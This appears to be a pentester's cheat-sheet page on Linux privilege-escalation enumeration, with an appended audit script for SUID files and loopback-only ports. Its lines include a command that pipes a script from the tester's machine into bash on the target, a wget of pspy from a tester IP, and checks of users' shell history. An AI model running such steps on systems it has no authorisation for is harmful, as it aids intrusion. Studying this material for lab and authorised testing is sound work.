2 Enums

Last updated 2 years ago

Start

sudo -l
crontab -l
ps auxww
uname -a
find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2>/dev/null   ..SUID/SGID files

pspy   ..snoop processes
find / -type f -user www-data 2>/dev/null    ..files
find / -type d -user www-data 2>/dev/null    ..dirs

LinEnum

  • Extracts a large amount of target info

  • Can find ports listening only on localhost, which may point to port knocking or pivots

  • Used by IppSec

wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh   ..or use the local copy:
cp /opt/LinEnum/LinEnum.sh .
python -m SimpleHTTPServer 80     ..serve it from your box (python3 equivalent: -m http.server 80)

cd /dev/shm/   ..ramdisk (data won't actually hit the disk)
cd /tmp        ..optional (the way I've been doing it)

curl http://$MyIP/LinEnum.sh | bash -s -- -t      ..easy execute, thorough (-t is LinEnum's flag, not curl's)
curl http://$MyIP/LinEnum.sh -o LinEnum.sh        ..download instead

bash LinEnum.sh -h                         ..help
bash LinEnum.sh -k password -e export -t   ..keyword, export dir, thorough

Linux Smart Enumeration

wget "https://github.com/diego-treitos/linux-smart-enumeration/raw/master/lse.sh" -O lse.sh; chmod 700 lse.sh
./lse.sh -h         ..help
./lse.sh -l 1 -i    ..level 1; -i = non-interactive (don't prompt for the user's password)
./lse.sh -l 2 -i    ..level 2: print everything

PsPy32

  • Snoop on processes/crons without needing root permissions.

  • Even finds root crontabs (the jobs show up as processes when they fire)

Copy it to the system with:
python -m SimpleHTTPServer 80     ..on your box, from the dir holding pspy32
wget http://10.10.14.34/pspy32    ..on the target
chmod +x pspy32                   ..mode bits don't survive the download
./pspy32 --help
./pspy32

Timers

  • systemd timers; kinda like crons

systemctl list-timers
watch -n 1 'systemctl list-timers'

Tools

REFS

Bonus Enums:

SUID/SGID

find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2>/dev/null

Writeable

cd /var/www/html/webservices/monstra/
find . -writable -ls

Enumeration Plan

  1. Check your id, whoami

  2. Linux Smart Enumeration (lse) with increasing levels

    1. lse

    2. lse -l 1

    3. lse -l 2

  3. LinEnum and other scripts

  4. If they fail, run the checks manually

    1. Or check other cheatsheets

    2. https://blog.g0tmi1k.com/..linux-privilege-escalation

  5. Check common files

    1. /var/backup

    2. /var/logs

    3. /tmp

    4. /home/user/.*history

Try easy ones first:

  1. sudo, cron, suid

  2. root processes, enumerate version, check exploits

  3. internal ports (localhost-only listeners) you can forward to your remote machine

Harder:

  1. Re-read your enums, look for oddities

  2. Unusual filesystems (anything besides ext, swap, tmpfs)

  3. Strange usernames

  4. Kernel exploits
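
The "easy ones first" list as a small audit script, added here and not part of the original page. Its two filters are fed constructed sample `ss -lnt` and SUID `find` output so it runs offline; `--live` runs the page's own commands on the host. The SUID baseline is a made-up illustrative list, not any distro's real one.

```shell
#!/usr/bin/env bash
# Added example, not from the original page: the "easy ones first" checks as a
# small audit script. Both functions are pure filters over command output on
# stdin; --live feeds them the real host's `find` and `ss` output.

# Constructed, illustrative baseline of SUID/SGID binaries you expect to see;
# anything not listed is printed for a closer look (distros differ, adjust it).
BASELINE_SUID="/usr/bin/passwd /usr/bin/sudo /usr/bin/su /usr/bin/mount /usr/bin/umount"

# Read SUID/SGID paths (one per line) and print those outside the baseline.
unexpected_suid() {
    while IFS= read -r path; do
        [ -n "$path" ] || continue
        case " $BASELINE_SUID " in
            *" $path "*) ;;               # known-good, skip
            *) printf '%s\n' "$path" ;;
        esac
    done
}

# Read `ss -lnt` output and print TCP ports that listen ONLY on loopback:
# invisible to the remote nmap scan, so candidates for port forwarding.
loopback_only_ports() {
    awk '$1 == "LISTEN" { n = split($4, a, ":"); port = a[n]
             if ($4 ~ /^(127\.0\.0\.1|\[::1\]):/) lo[port] = 1; else any[port] = 1 }
         END { for (p in lo) if (!(p in any)) print p }' | sort -n
}

# Constructed sample data so the script runs offline.
SAMPLE_SUID='/usr/bin/passwd
/usr/bin/sudo
/usr/local/bin/legacy-report
/opt/app/bin/helper'
SAMPLE_SS='State  Recv-Q Send-Q Local Address:Port  Peer Address:Port
LISTEN 0      128    0.0.0.0:22          0.0.0.0:*
LISTEN 0      80     127.0.0.1:3306      0.0.0.0:*
LISTEN 0      128    [::1]:8080          [::]:*
LISTEN 0      128    [::]:22             [::]:*'

if [ "${1:-}" = "--live" ]; then
    id
    sudo -n -l 2>/dev/null || echo "sudo -l wants a password; run it by hand"
    find / -type f \( -perm -u+s -o -perm -g+s \) 2>/dev/null | unexpected_suid
    ss -lnt 2>/dev/null | loopback_only_ports
else
    echo "unexpected SUID/SGID:"; printf '%s\n' "$SAMPLE_SUID" | unexpected_suid
    echo "loopback-only ports:";  printf '%s\n' "$SAMPLE_SS" | loopback_only_ports
fi
```

On the sample data it reports the two non-baseline SUID paths and ports 3306 and 8080 (22 is bound on all interfaces, so it is not loopback-only).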

REF:

Get the tools.zip from , and save them as a toolset

  • https://github.com/rebootuser/LinEnum
  • Linux Smart Enumeration: https://github.com/diego-treitos/linux-smart-enumeration
  • https://github.com/DominicBreuker/pspy/releases/download/v1.2.0/pspy32
  • https://github.com/DominicBreuker/pspy/releases/download/v1.2.0/pspy64
  • LookAround
  • AutoRecon-Tib3rius
  • linted/linuxprivchecker
  • AlessandroZ/BeRoot
  • pentestmonkey/unix-privesc-check
  • FingerEnums
  • procmon
  • UdemyClass